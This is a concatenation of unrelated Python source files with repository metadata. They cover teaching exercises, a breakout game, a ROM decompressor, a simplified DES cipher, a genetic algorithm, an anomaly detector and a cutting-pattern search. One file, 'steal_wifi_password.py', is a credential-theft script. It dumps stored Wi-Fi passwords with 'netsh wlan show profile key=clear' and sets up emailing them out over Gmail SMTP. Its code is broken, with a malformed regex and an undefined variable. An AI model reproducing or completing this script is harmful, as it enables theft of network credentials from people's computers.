integerTwo = 2
# Two float values to be used for the rest of the program.
floatOne = 3.14
floatTwo = 5.3
# Multiplying two float values.
productOfFloats = floatOne * floatTwo
print(str(productOfFloats))
# Division of two float values.
quotientOfFloats = floatTwo / floatOne
print(str(quotientOfFloats))
# Using integer division on two floats
integerDivisionOfFloats = floatTwo // floatOne
print(str(integerDivisionOfFloats))
# Using the modulo operator
moduloOfIntegers = 5 % 2
print(str(moduloOfIntegers))
# Converting between floats and integers
print(str(int(floatOne)))
print(str(float(integerOne)))
# Equation
print(str(4 * 2 / 8))
# Getting input from the user using input('Question goes here')
# Then formatting and printing back out the user input.
name = input('Enter your name: ') # Note: This asks the user to 'Enter your name: '. Do NOT change this to your name directly
age = input('Enter your age: ')
print('Hello ' + str(name) + ', you are ' + str(age) + ' years old.')
| true |
5c6d5332751279c637ea81a10925aae4f17fce2e | Python | sahwar/AlchemEngineLegacy | /examples/breakout/scripts/main.py | UTF-8 | 2,789 | 3.0625 | 3 | [] | no_license |
from engine import CollisionBox
import math
class Box:
def __init__(self, x, y):
self.box = CollisionBox(x, y, 1, 1)
def draw(self):
ctx.spr(tex, self.box.x, self.box.y, 1, 1, 0, shad)
class Paddle:
def __init__(self):
w = 4
x = (ctx.width() - w) / 2
y = ctx.height() - 2
h = 0.5
# the box will not only be used for the collisions,
# but also to store position
self.box = CollisionBox(x, y, w, h)
self.speed = 15
def draw(self):
ctx.spr(tex, self.box.x, self.box.y, self.box.w, self.box.h, 0, shad)
def update(self, dt):
# get player input
dir = 0
if ctx.key('A'):
dir -= 1
if ctx.key('D'):
dir += 1
# update x position and collide with the screen boundaries
self.box.x += dir * self.speed * dt
self.box.x = max(0, self.box.x)
self.box.x = min(ctx.width() - self.box.w, self.box.x)
class Ball:
def __init__(self):
w = 0.5
x = (ctx.width() - w) / 2
y = ctx.height() - 3
h = 0.5
self.box = CollisionBox(x, y, w, h)
self.speed = 5
self.vx = self.speed
self.vy = self.speed
def draw(self):
ctx.spr(tex, self.box.x, self.box.y, self.box.w, self.box.h, 0, shad)
def update(self, dt):
self.box.x += self.vx * dt
self.box.y += self.vy * dt
if self.box.x < 0:
self.vx *= -1
self.box.x = 0
if self.box.x > ctx.width() - self.box.w:
self.vx *= -1
self.box.x = ctx.width() - self.box.w
if self.box.y < 0:
self.vy *= -1
self.box.y = 0
def collide(self, other):
col = self.box.collideWith(other)
if col.collided:
if col.horizontal:
self.vx *= -1
if col.vertical:
self.vy *= -1
return True
return False
def collidePaddle(self, paddle):
col = self.box.collideWith(paddle.box)
if col.collided:
if col.vertical:
vy = -self.speed
if self.vx > 0:
vx = self.speed
else:
vx = -self.speed
xMult = 1 + 2.5 * abs((paddle.box.x + paddle.box.w / 2) - (self.box.x + self.box.w / 2)) / paddle.box.w
vx *= xMult
self.vx = vx
self.vy = vy
if col.horizontal:
self.vx *= -1
tex = None
shad = None
paddle = None
ball = None
boxes = []
lives = 0
def start():
startLevel()
def startLevel():
global tex, paddle, ball, boxes, lives, shad
tex = ctx.loadSprite('-blank')
shad = ctx.loadShader('rainbow')
paddle = Paddle()
ball = Ball()
if lives > 0:
pass
else:
boxes = []
for x in range(0, int(ctx.width())):
for y in range(2, 7):
box = Box(x, y)
boxes.append(box)
lives = 3
def update(dt):
global lives
paddle.update(dt)
ball.update(dt)
ball.collidePaddle(paddle)
for box in boxes:
if ball.collide(box.box):
boxes.remove(box)
break
if ball.box.y > ctx.height():
lives -= 1
startLevel()
ctx.clr(0.075, 0.075, 0.1)
paddle.draw()
ball.draw()
for box in boxes:
box.draw()
| true |
ad69a0845f6d922b986045909c64291607beb18a | Python | djkranoll/game-tools | /nes/mckids_decomp.py | UTF-8 | 3,795 | 3.328125 | 3 | [] | no_license | # M.C. Kids Text Decompressor
# Written by Alchemic
# 2012 Nov 13
#
#
#
# A detailed description of the compression format:
#
# - Compressed data is prefixed with a byte that specifies the
# size of the pastcopy command's arguments. The high nybble
# indicates the size of a pastcopy's source; the low nybble,
# the size of a pastcopy's length.
#
# - Following this is the compressed data itself: a stream of
# bits that breaks down into two commands, "pastcopy" and
# "literal". Bits are read from one byte at a time, most
# significant to least (0x80, 0x40, 0x20 ... 0x01).
#
# Pastcopy = [0 (S) (L)]
# Literal = [1 NNNNNNNN]
#
# - Pastcopy copies data from the sliding window.
# - The S argument indicates the data source, which is a
# relative to the current position. 1 is the most-recently
# decompressed byte, 2 is the byte before that, and so on.
# If S is 0, we've reached the end of the compressed data.
# - The L argument indicates how many bytes to copy. Since
# it would be wasteful to copy a small number of bytes
# (cheaper in bits to use literals), we actually copy
# L+3 bytes.
#
# - Literal is exactly what it says on the tin. The N argument
# is one uncompressed byte.
#
#
#
# This code uses python-bitstring:
# http://code.google.com/p/python-bitstring/
import sys
import bitstring
def decompress(romFile, startOffset):
# Define some useful constants.
BIT_PASTCOPY = 0
BIT_LITERAL = 1
# Open the ROM.
romStream = bitstring.ConstBitStream(filename=romFile)
romStream.bytepos += startOffset
# Allocate storage for the decompressed output.
decomp = bytearray()
# Read the first byte.
# (It specifies the size of pastcopy's two arguments.)
copySourceSize = romStream.read('uint:4')
copyLengthSize = romStream.read('uint:4')
# Main decompression loop.
while True:
nextCommand = romStream.read('bool')
if nextCommand == BIT_PASTCOPY:
# 0: Pastcopy case.
copySource = romStream.read(copySourceSize).uint
copyLength = romStream.read(copyLengthSize).uint
copyLength += 3
# A copy source of 0 indicates the end.
if copySource == 0:
break
for i in xrange(copyLength):
decomp.append(decomp[-copySource])
elif nextCommand == BIT_LITERAL:
# 1: Literal case.
literalByte = romStream.read('uint:8')
decomp.append(literalByte)
# Calculate the end offset.
romStream.bytealign()
endOffset = romStream.bytepos
# Return the decompressed data and end offset.
return (decomp, endOffset)
if __name__ == "__main__":
# Check for incorrect usage.
argc = len(sys.argv)
if argc < 3 or argc > 4:
sys.stdout.write("Usage: ")
sys.stdout.write("{0:s} ".format(sys.argv[0]))
sys.stdout.write("<romFile> <startOffset> [outFile]\n")
sys.exit(1)
# Copy the arguments.
romFile = sys.argv[1]
startOffset = int(sys.argv[2], 16)
outFile = None
if argc == 4:
outFile = sys.argv[3]
# Decompress the data.
outBytes, endOffset = decompress(romFile, startOffset)
# Write the decompressed output, if appropriate.
if outFile is not None:
outStream = open(outFile, "wb")
outStream.write(outBytes)
outStream.close()
# Report the size of the compressed data and last offset.
sys.stdout.write("Original compressed size: 0x{0:X} ({0:d}) bytes\n".format(endOffset - startOffset))
sys.stdout.write("Last offset read, inclusive: {0:X}\n".format(endOffset - 1))
# Exit.
sys.exit(0)
| true |
f82e9271c75798c29f510b56dac06688cbd6e625 | Python | plvaliente/Trabajos-Academicos | /Algoritmos y Estructuras de Datos 3/tp2/Problema1/ExpCOMP.py | UTF-8 | 1,149 | 2.65625 | 3 | [] | no_license | import random as rnd
from sets import Set
from subprocess import call
def grafoCompletoEj1SinCierreArchivoSINPREMIUM(n, k, pathSalida,limite, cantRep):
fOut = open(pathSalida, 'w')
for rep in range(cantRep):
fOut.write(str(n) + " " + str((n*(n-1))/2 ) + '\n' )
origen = rnd.randint(1,n)
destino = rnd.randint(1,n)
while destino == origen:
destino = rnd.randint(1,n)
fOut.write(str(origen) + " " + str(destino) + " " + str(k) + '\n')
for i in range(1,n + 1):
for j in range(i,n+1):
if j != i:
linea = str(i)+ " " + str(j) + " " + str(0) + " " + str(rnd.randint(1,limite))
fOut.write(linea + '\n')
fOut.write("-1 -1" + '\n')
pathSalida = "InGrafoCOMP"
valoresN = [5, 7, 10, 12, 15, 17, 20, 25, 30, 35, 40, 45, 50, 60, 70, 80]
for i in range(100,301,20):
valoresN.append(i)
for i in range(350,1001,50):
valoresN.append(i)
for i in range(len(valoresN)):
grafoCompletoEj1SinCierreArchivoSINPREMIUM(valoresN[i], 0, "InGrafoCOMP",30, 10)
print(valoresN[i])
call("./expC")
| true |
23aaa96700c432c20f10c7842e3ba25131bfc805 | Python | saulocatharino/aula_01 | /matriz.py | UTF-8 | 234 | 2.71875 | 3 | [] | no_license | import matplotlib.pyplot as plt
import numpy as np
import cv2
Y = []
for x in range(3):
for y in range(30):
Y.append([[255,0,0],[0,255,0],[0,0,255]])
YYY = np.array(Y)
YY = YYY.reshape(-1,30,3)
plt.imshow(YY)
plt.show()
| true |
2df7a328955f6a1091e1291b43059ce84203fe34 | Python | timkao/historical-python | /ex14.py | UTF-8 | 637 | 3.515625 | 4 | [] | no_license | from sys import argv
script, user_name, spouse = argv
start = '> '
print "Hi %s, I'm the %s script." % (user_name, script)
print "I'd like to ask you a few questions."
print "Do you like me %s?" % user_name
like = raw_input(start)
print "Is %s your wife?" % spouse
wife = raw_input(start)
print "Where do you live %s?" % user_name
lives = raw_input(start)
print "What kind of computer do you have?"
computer = raw_input(start)
print """Alright, so you said %r about liking me.
You live in %r. Not sure where that is.
And %r your wife is her. You have a %r computer. Nice.""" % (like, lives, wife, computer)
| true |
70f72a0ca9f07221b335d53944872806066655d9 | Python | GibJaf/Gibraan-VIIT | /BE/Sem8/ICS/A2_Folders/A2_Batch/421053/Assignment 1/Assignment1.py | UTF-8 | 4,556 | 2.984375 | 3 | [] | no_license |
from sys import exit
from time import time
KeyLength = 10
SubKeyLength = 8
DataLength = 8
FLength = 4
# Tables for initial and final permutations (b1, b2, b3, ... b8)
IPtable = (2, 6, 3, 1, 4, 8, 5, 7)
FPtable = (4, 1, 3, 5, 7, 2, 8, 6)
# Tables for subkey generation (k1, k2, k3, ... k10)
P10table = (3, 5, 2, 7, 4, 10, 1, 9, 8, 6)
P8table = (6, 3, 7, 4, 8, 5, 10, 9)
# Tables for the fk function
EPtable = (4, 1, 2, 3, 2, 3, 4, 1)
S0table = (1, 0, 3, 2, 3, 2, 1, 0, 0, 2, 1, 3, 3, 1, 3, 2)
S1table = (0, 1, 2, 3, 2, 0, 1, 3, 3, 0, 1, 0, 2, 1, 0, 3)
P4table = (2, 4, 3, 1)
def perm(inputByte, permTable):
"""Permute input byte according to permutation table"""
outputByte = 0
for index, elem in enumerate(permTable):
if index >= elem:
outputByte |= (inputByte & (128 >> (elem - 1))) >> (index - (elem - 1))
else:
outputByte |= (inputByte & (128 >> (elem - 1))) << ((elem - 1) - index)
return outputByte
def ip(inputByte):
"""Perform the initial permutation on data"""
return perm(inputByte, IPtable)
def fp(inputByte):
"""Perform the final permutation on data"""
return perm(inputByte, FPtable)
def swapNibbles(inputByte):
"""Swap the two nibbles of data"""
return (inputByte << 4 | inputByte >> 4) & 0xff
def keyGen(key):
"""Generate the two required subkeys"""
def leftShift(keyBitList):
"""Perform a circular left shift on the first and second five bits"""
shiftedKey = [None] * KeyLength
shiftedKey[0:9] = keyBitList[1:10]
shiftedKey[4] = keyBitList[0]
shiftedKey[9] = keyBitList[5]
return shiftedKey
# Converts input key (integer) into a list of binary digits
keyList = [(key & 1 << i) >> i for i in reversed(range(KeyLength))]
permKeyList = [None] * KeyLength
for index, elem in enumerate(P10table):
permKeyList[index] = keyList[elem - 1]
shiftedOnceKey = leftShift(permKeyList)
shiftedTwiceKey = leftShift(leftShift(shiftedOnceKey))
subKey1 = subKey2 = 0
for index, elem in enumerate(P8table):
subKey1 += (128 >> index) * shiftedOnceKey[elem - 1]
subKey2 += (128 >> index) * shiftedTwiceKey[elem - 1]
return (subKey1, subKey2)
def fk(subKey, inputData):
"""Apply Feistel function on data with given subkey"""
def F(sKey, rightNibble):
aux = sKey ^ perm(swapNibbles(rightNibble), EPtable)
index1 = ((aux & 0x80) >> 4) + ((aux & 0x40) >> 5) + \
((aux & 0x20) >> 5) + ((aux & 0x10) >> 2)
index2 = ((aux & 0x08) >> 0) + ((aux & 0x04) >> 1) + \
((aux & 0x02) >> 1) + ((aux & 0x01) << 2)
sboxOutputs = swapNibbles((S0table[index1] << 2) + S1table[index2])
return perm(sboxOutputs, P4table)
leftNibble, rightNibble = inputData & 0xf0, inputData & 0x0f
return (leftNibble ^ F(subKey, rightNibble)) | rightNibble
def encrypt(key, plaintext):
"""Encrypt plaintext with given key"""
data = fk(keyGen(key)[0], ip(plaintext))
return fp(fk(keyGen(key)[1], swapNibbles(data)))
def decrypt(key, ciphertext):
"""Decrypt ciphertext with given key"""
data = fk(keyGen(key)[1], ip(ciphertext))
return fp(fk(keyGen(key)[0], swapNibbles(data)))
if __name__ == '__main__':
try:
assert encrypt(0b0000000000, 0b10101010) == 0b00010001
except AssertionError:
print("Error on encrypt:")
print("Output: ", encrypt(0b0000000000, 0b10101010), "Expected: ", 0b00010001)
exit(1)
try:
assert encrypt(0b1110001110, 0b10101010) == 0b11001010
except AssertionError:
print("Error on encrypt:")
print("Output: ", encrypt(0b1110001110, 0b10101010), "Expected: ", 0b11001010)
exit(1)
try:
assert encrypt(0b1110001110, 0b01010101) == 0b01110000
except AssertionError:
print("Error on encrypt:")
print("Output: ", encrypt(0b1110001110, 0b01010101), "Expected: ", 0b01110000)
exit(1)
try:
assert encrypt(0b1111111111, 0b10101010) == 0b00000100
except AssertionError:
print("Error on encrypt:")
print("Output: ", encrypt(0b1111111111, 0b10101010), "Expected: ", 0b00000100)
exit(1)
t1 = time()
for i in range(1000):
encrypt(0b1110001110, 0b10101010)
t2 = time()
print("Elapsed time for 1,000 encryptions: {:0.3f}s".format(t2 - t1))
| true |
3987ce77ce50e765bc53bd67d6a941a2bdf2d360 | Python | krishpranav/steal_wifi_password | /steal_wifi_password.py | UTF-8 | 923 | 2.546875 | 3 | [] | no_license | import subprocess
import smtplib
import re
email = input("Enter your Email Address >> ")
password = input("Enter The Password For Your Email Address")
def author():
print("TOOL IS CREATED BY KRISNA PRANAV")
print("Github Link https://www.github.com/krishpranav")
print("DO NOT FOGET TO FOLLOW ME :)")
def send_mail(email, password, message):
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls
server.login(email, password)
server.sendmail(email, email, message)
server.quit
command = "netsh wlan show profile key=clear" #enter the target router name before the key
networks = subprocess.check_output(command, shell=True)
network_names_list = re.findall("(?:profile"\s*:\s)(.*))
for network_name in network_names_list:
command = "netsh wlan show profile" + network_name + "key=clear"
current_result = subprocess.check_output(command, shell=True)
result = result + current_result
author()
| true |
baaf4c2f7c7c3d90cd0cfd4e50f45f551544a406 | Python | magnoazneto/IFPI_Algoritmos | /cap05/Ex5_5_teste.py | UTF-8 | 335 | 3.78125 | 4 | [] | no_license | import turtle
def main():
bob = turtle.Turtle()
bob.pensize(1)
bob.speed(1)
draw(bob, 50, 4)
turtle.mainloop()
def draw(t, length, n):
if n == 0:
return
angle = 50
t.fd(length * n)
t.lt(angle)
draw(t, length, n-1)
t.rt(2 * angle)
draw(t, length, n-1)
t.lt(angle)
t.bk(length * n)
if __name__ == '__main__':
main() | true |
9725de0d379d33b68bff759041ae69e0b1015016 | Python | tnakaicode/jburkardt-python | /r8lib/r8_nint.py | UTF-8 | 1,739 | 3 | 3 | [] | no_license | #! /usr/bin/env python3
#
def r8_nint ( x ):
#*****************************************************************************80
#
## R8_NINT returns the nearest integer to an R8.
#
# Example:
#
# X R8_NINT
#
# 1.3 1
# 1.4 1
# 1.5 1 or 2
# 1.6 2
# 0.0 0
# -0.7 -1
# -1.1 -1
# -1.6 -2
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 25 July 2014
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# Input, real X, the value.
#
# Output, integer VALUE, the nearest integer to X.
#
if ( x < 0.0 ):
s = -1
else:
s = 1
value = s * round ( abs ( x ) + 0.5 )
return value
def r8_nint_test ( ):
#*****************************************************************************80
#
## R8_NINT_TEST tests R8_NINT
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 26 July 2014
#
# Author:
#
# John Burkardt
#
import platform
from r8_uniform_ab import r8_uniform_ab
seed = 123456789
test_num = 10
print ( '' )
print ( 'R8_NINT_TEST' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' R8_NINT produces the nearest integer.' )
print ( '' )
print ( ' X R8_NINT(X)' )
print ( '' )
b = -10.0
c = +10.0
for test in range ( 0, test_num ):
x, seed = r8_uniform_ab ( b, c, seed )
print ( ' %10f %6d' % ( x, r8_nint ( x ) ) )
#
# Terminate.
#
print ( '' )
print ( 'R8_NINT_TEST' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
r8_nint_test ( )
timestamp ( )
| true |
95e2d22b88f4dbd4d10bf498bf5697d79d4a200e | Python | nikolaik/p2coffee | /p2coffee/utils.py | UTF-8 | 1,217 | 2.515625 | 3 | [] | no_license | import logging
import io
import requests
from django.conf import settings
from django.utils.timezone import is_naive, get_current_timezone_name, pytz, is_aware, localtime
from requests.exceptions import ConnectionError
logger = logging.getLogger(__name__)
def format_local_timestamp(dt, dt_format='%Y-%m-%d %H:%M'):
"""Returns a formatted localized timestamp according current timezone
:param dt: A datetime object
:param dt_format: Format string passed to strftime"""
if is_naive(dt):
tz = pytz.timezone(get_current_timezone_name())
dt = tz.localize(dt)
elif is_aware(dt):
dt = localtime(dt)
return dt.strftime(dt_format)
def coffee_image():
url = settings.COFFEE_CAMERA_URL
auth = (settings.COFFEE_CAMERA_USER, settings.COFFEE_CAMERA_PASS)
try:
response = requests.get(url, auth=auth)
if response.status_code == 200:
logger.debug("Got image with %d bytes", len(response.content))
return io.BytesIO(response.content)
logger.error("Couldn't get camera image: %s", str(response.content))
except ConnectionError as e:
logger.error("Couldn't get camera image: %s", str(e))
return None
| true |
e38f9f6f08cca76a762882cb4bb30cf4d99dc65c | Python | AlfonsBC/competitive_programming | /codeforces/soldier_and_bananas.PY | UTF-8 | 118 | 2.765625 | 3 | [] | no_license | k,n,w = map(int, input().split())
result = (k *int((w+1)*w / 2))- n
if result>0:
print(result)
else:
print(0) | true |
e3f0f6994fbd7b73d3f107b3dbadf8d8426c0583 | Python | JanStoltman/100DaysOfCode | /Python/Genetic algorithms/Lab1/Algorithm.py | UTF-8 | 4,689 | 2.90625 | 3 | [
"MIT"
] | permissive | import random
import copy
import sys
from Lab1.Creature import Creature
from Lab1.Writer import write
class Algorithm:
def __init__(self, flow, dist, pop_size, init_pop, generations, pm, px, tour, selection_type, crossover_size):
self.population = init_pop
self.flow = flow
self.dist = dist
self.pop_size = pop_size
self.generations = generations
self.pm = pm
self.px = px
self.tour = tour
self.selection_type = selection_type
self.crossover_size = crossover_size
self.best = Creature()
self.worst = 0
def run(self):
for generation in range(0, self.generations):
# Eval all curent gen
for creature in self.population:
self.assess_fitness(creature)
if creature.eval < self.best.eval:
self.best = copy.deepcopy(creature)
if creature.eval > self.worst:
self.worst = creature.eval
# self.print_fittest()
self.selection()
self.crossover()
self.mutation()
def print_fittest(self):
c = min(self.population, key=lambda x: x.eval)
print(c.eval)
print(c.matrix)
def selection(self):
if self.selection_type == 'r':
self.roulette()
elif self.selection_type == 't':
self.tournament()
else:
raise ValueError("Selection type not supported: " + self.selection_type)
def roulette(self):
tmp_pop = []
s = sum(map(lambda x: x.eval, self.population))
mi = min(self.population, key=lambda x: x.eval).eval
mx = max(self.population, key=lambda x: x.eval).eval + mi
for _ in range(0, self.crossover_size):
r = random.randint(0, s)
i = random.randint(0, len(self.population) - 1)
while r < s:
r += (mx - self.population[i].eval)
i += 1
if i >= len(self.population):
i = 0
tmp_pop.append(self.population[i])
self.population = tmp_pop
def tournament(self):
tmp_pop = []
for _ in range(0, self.crossover_size):
random.shuffle(self.population)
tmp = self.population[0:self.tour]
tmp_pop.append(min(tmp, key=lambda x: x.eval))
self.population.clear()
self.population.extend(tmp_pop)
def crossover(self):
tmp_pop = []
while len(self.population) + len(tmp_pop) < self.pop_size:
random.shuffle(self.population)
i = random.uniform(0, 1)
if i < self.px:
tmp_pop.append(self.breed(self.population[0], self.population[1]))
self.population.extend(tmp_pop)
def breed(self, mother, father):
c1, c2 = self.pmx(mother, father)
return c1
def simple(self, mother, father):
c = Creature()
l = len(mother.matrix)
hl = int(l / 2)
c.set_matrix(mother.matrix[0:hl], father.matrix[hl:l])
return c
def pmx(self, mother, father):
c1 = copy.deepcopy(mother)
c2 = copy.deepcopy(father)
size = len(c1.matrix)
p1, p2 = [0] * size, [0] * size
for i in range(0, size):
p1[c1.matrix[i][1]] = i
p2[c2.matrix[i][1]] = i
cxpoint1 = random.randint(0, size)
cxpoint2 = random.randint(0, size - 1)
if cxpoint2 >= cxpoint1:
cxpoint2 += 1
else:
cxpoint1, cxpoint2 = cxpoint2, cxpoint1
for i in range(cxpoint1, cxpoint2):
temp1 = c1.matrix[i][1]
temp2 = c2.matrix[i][1]
c1.matrix[i][1], c1.matrix[p1[temp2]][1] = temp2, temp1
c2.matrix[i][1], c2.matrix[p1[temp2]][1] = temp1, temp2
p1[temp1], p1[temp2] = p1[temp2], p1[temp1]
p2[temp1], p2[temp2] = p2[temp2], p2[temp1]
return c1, c2
def assess_fitness(self, creature):
creature.check_fabs()
result = 0
for i in range(0, len(creature.matrix)):
for j in range(i, len(creature.matrix)):
val = creature.matrix[i]
val2 = creature.matrix[j]
d = self.dist[val[0]][val2[0]]
f = self.flow[val[1]][val2[1]]
ds = self.dist[val2[0]][val[0]]
fs = self.flow[val2[1]][val[1]]
result += f * d + fs * ds
creature.eval = result
def mutation(self):
for c in self.population:
i = random.uniform(0, 1)
if i < self.pm:
c.mutate()
| true |
ddb44e4e40e309b981a01d63a5379d21b7934142 | Python | jjaramillom/sklearnflask | /Anomalies_Detector.py | UTF-8 | 6,426 | 2.8125 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.linear_model import Lasso
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
class AnomalyDetector:
def __init__(self, train_df: pd.DataFrame, target: str, timeVar: str, predictors: list, pastTargetasPredictor: bool = False, model: str = 'RandomForest'):
self.TARGETVAR = target
self.TIMEVAR = timeVar
self.PASTVAR = pastTargetasPredictor
self.MODELNAME = model
self.TRAIN_DF = self._preprocess(train_df)
def _get_x_y(self, dataFrame):
y = dataFrame[self.TARGETVAR]
return dataFrame.drop(self.TARGETVAR, axis = 1), y
def _addPreviousTarget(self, dataFrame):
Shiftedvar = str('previous ') + self.TARGETVAR
dataFrame[Shiftedvar] = dataFrame[self.TARGETVAR].shift()
return dataFrame
def _fillNA(self, dataFrame):
dataFrame.fillna(method = 'ffill', inplace = True)
dataFrame.fillna(method = 'bfill', inplace = True)
def _preprocess(self, dataFrame):
dataFrame.drop(self.TIMEVAR, axis = 1, inplace = True)
if (self.PASTVAR):
dataFrame = self._addPreviousTarget(dataFrame)
dataFrame = dataFrame.apply(pd.to_numeric)
self._fillNA(dataFrame)
return dataFrame
def predict(self, dataFrame: pd.DataFrame):
self.ewmaAlpha = 0.4
self.TIMESTAMP = pd.to_datetime(dataFrame[self.TIMEVAR], infer_datetime_format=True)
dataFrame = self._preprocess(dataFrame)
X, y = self._get_x_y(dataFrame)
columns = ['Timestamp','Target', 'TargetEWMA']
columns.append(self.MODELNAME)
self.predictions = pd.DataFrame(columns = columns)
self.predictions['Timestamp'] = self.TIMESTAMP
self.predictions['Target'] = y
self.predictions['TargetEWMA'] = y.ewm(alpha = self.ewmaAlpha).mean()
self.predictions[self.MODELNAME] = self.model.predict(X)
self.predictions['Alarm'] = self.predictions.apply(lambda row: 1 if np.abs(row[self.MODELNAME] - row['TargetEWMA']) > 5 else 0, axis = 1)
predictions = self.predictions
predictions['Timestamp'] = predictions['Timestamp'].astype(str)
return self.predictions
def _fit(self, X, y):
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.3) #random_state = 5,
self.model.fit(X_train, y_train)
score = {'training': np.around(self.model.score(X_train, y_train), decimals=3), 'test': np.around(self.model.score(X_test, y_test), decimals = 3)}
return score
def trainModel(self, parameters: dict = {'RandomForest': {'trees': 20, 'max_depth': 10}, 'KNeighbors': {'n_neighbors': 20}, 'Lasso': {'alpha': 2.5}}):
X, y = self._get_x_y(self.TRAIN_DF)
self.predictors = X.columns
if self.MODELNAME == 'RandomForest':
self.model = (RandomForestRegressor(n_jobs = -1, n_estimators = parameters['RandomForest']['trees'], max_depth = parameters['RandomForest']['max_depth']))
elif self.MODELNAME == 'KNeighbors':
self.model = (KNeighborsRegressor(n_jobs = -1, n_neighbors = parameters['KNeighbors']['n_neighbors']))
elif self.MODELNAME == 'Lasso':
self.model = (Lasso(alpha = parameters['Lasso']['alpha']))
self.score = self._fit(X, y)
return self.model, self.score
def feature_importances(self):
if self.MODELNAME == 'RandomForest':
return pd.DataFrame(self.model.feature_importances_, index = self.predictors, columns=['importance']).sort_values('importance', ascending=False)
return 'ERROR. This function is only valid for Random Forest models. Please create ones'
def plot(self, start: int = 0, end: int = 0, title: str = 'Predictions', fileName: str = 'plot.png', dpi: int = 200, size: list = [12,5]):
if end == 0:
end = self.predictions.index.size
labels = ['Target', 'Target EWMA ' + r'$\alpha=$' + str(self.ewmaAlpha)]
labels.append(self.MODELNAME + r' $R^2 = $ {0:.3f}'.format(self.score['test']))
toPlot = [self.predictions.drop('Timestamp', axis = 1), labels]
size[1] *= (len(labels) - 2)
self.plotSeries(toPlot, self.TIMESTAMP, start, end, title, fileName, size)
def plotSeries(self, data, ticks, start, stop, title, fileName, size):
numberOfTicks = 15
toCompare = 'TargetEWMA' ##Target
filteredData = data[0].iloc[start:stop]
step = int(np.ceil((stop - start)/numberOfTicks))
x = np.arange(filteredData.index.size)
ax = plt.gca()
fig = plt.gcf()
fig.set_size_inches(size[0], size[1])
fig.suptitle(title, fontsize=16)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.grid(True)
i = 0
my_xticks = ticks[start:stop:step]
columns = filteredData.columns.values
lastCol = columns.size - 1
dif = 5
for column in filteredData:
if(i > 1):
ax = plt.subplot(len(data[1]) - 2, 1, i-1)
plt.ylim([35,80])
if (i != lastCol):
plt.xticks(np.arange(0, filteredData.index.size, step))
plt.setp(ax.get_xticklabels(), visible = False)
else:
plt.xticks(np.arange(0, filteredData.index.size, step), my_xticks, rotation=80)
# dif = np.std(filteredData[toCompare])
plt.plot(x, filteredData[toCompare], label = data[1][1], c = 'lime')
plt.plot(x, filteredData[column], label = data[1][i], c = 'chocolate')
ax.fill_between(x, filteredData[toCompare], filteredData[column],
where=filteredData[toCompare] - filteredData[column] > dif,
facecolor= 'wheat', interpolate=True) #(0.18,0.38,0.6,0.65)
plt.legend()
i += 1
plt.tight_layout(rect = (0,0,1,0.96))
plt.savefig(fileName, dpi=200)
plt.show()
| true |
c0a606edad70d2a63b8015a8eb56c9b2777ce13d | Python | leGIT-bot/CS-pattern-reduction | /ReturnSeeds.py | UTF-8 | 4,595 | 2.953125 | 3 | [] | no_license | import random
def GenerateDynamicTable(sizes, stripSize):
DynamicTable = [0]*(stripSize + 1)
for i in range(0, stripSize + 1):
DynamicTable[i] = {'currentSolution':[], 'remainingSizes':[], 'previousSolutions':[]}
DynamicTable[0]['remainingSizes'] = DetermineAvailableSizes(stripSize, sizes)
ReturnChild(DynamicTable)
#for i in range(0, stripSize + 1):
# if len(DynamicTable[i]['remainingSizes']) > 0:
# size = DynamicTable[i]['remainingSizes'].pop()
# DynamicTable[i + size]['previousSolutions'].append(DynamicTable[i]['currentSolution'] + [size])
# DynamicTable[i + size]['currentSolution'] = DynamicTable[i]['currentSolution'] + [size]
# DynamicTable[i + size]['remainingSizes'] = DetermineAvailableSizes(stripSize - i - size, DynamicTable[i]['remainingSizes'])
#
#if DynamicTable[stripSize]['currentSolution'] == []:
# DynamicTable[stripSize]['currentSolution'] = None
return DynamicTable
def DetermineAvailableSizes(spaceLeft, sizes):
AvailableSizes = []
if isinstance(sizes, list):
for size in sizes:
if size <= spaceLeft:
AvailableSizes.append(size)
else:
for size in sizes:
if size <= spaceLeft:
for _ in range(0, sizes[size]):
AvailableSizes.append(size)
return AvailableSizes
def ReturnChild(DynamicTable):
TableLength = len(DynamicTable) - 1
returnSolution = DynamicTable[TableLength]['currentSolution']
NewSolutionFound = False
backtracking = True
CurrentPosition = TableLength - 1
while NewSolutionFound == False:
if backtracking:
if len(DynamicTable[CurrentPosition]['remainingSizes']) > 0:
size = DynamicTable[CurrentPosition]['remainingSizes'].pop()
newSolution = DynamicTable[CurrentPosition]['currentSolution'] + [size]
if CheckRepeatSolution(newSolution, DynamicTable[CurrentPosition + size]['previousSolutions']):
DynamicTable[CurrentPosition + size]['previousSolutions'].append(newSolution)
DynamicTable[CurrentPosition + size]['currentSolution'] = newSolution
DynamicTable[CurrentPosition + size]['remainingSizes'] = DetermineAvailableSizes(TableLength - CurrentPosition - size, DynamicTable[CurrentPosition]['remainingSizes'])
backtracking = False
CurrentPosition = CurrentPosition + size
else:
CurrentPosition = CurrentPosition - 1
else:
if CurrentPosition == TableLength:
#print(DynamicTable[TableLength]['previousSolutions'])
NewSolutionFound = True
else:
if len(DynamicTable[CurrentPosition]['remainingSizes']) > 0:
size = DynamicTable[CurrentPosition]['remainingSizes'].pop()
newSolution = DynamicTable[CurrentPosition]['currentSolution'] + [size]
if CheckRepeatSolution(newSolution, DynamicTable[CurrentPosition + size]['previousSolutions']):
DynamicTable[CurrentPosition + size]['previousSolutions'].append(newSolution)
DynamicTable[CurrentPosition + size]['currentSolution'] = DynamicTable[CurrentPosition]['currentSolution'] + [size]
DynamicTable[CurrentPosition + size]['remainingSizes'] = DetermineAvailableSizes(TableLength - CurrentPosition - size, DynamicTable[CurrentPosition]['remainingSizes'])
CurrentPosition = CurrentPosition + size
else:
backtracking = True
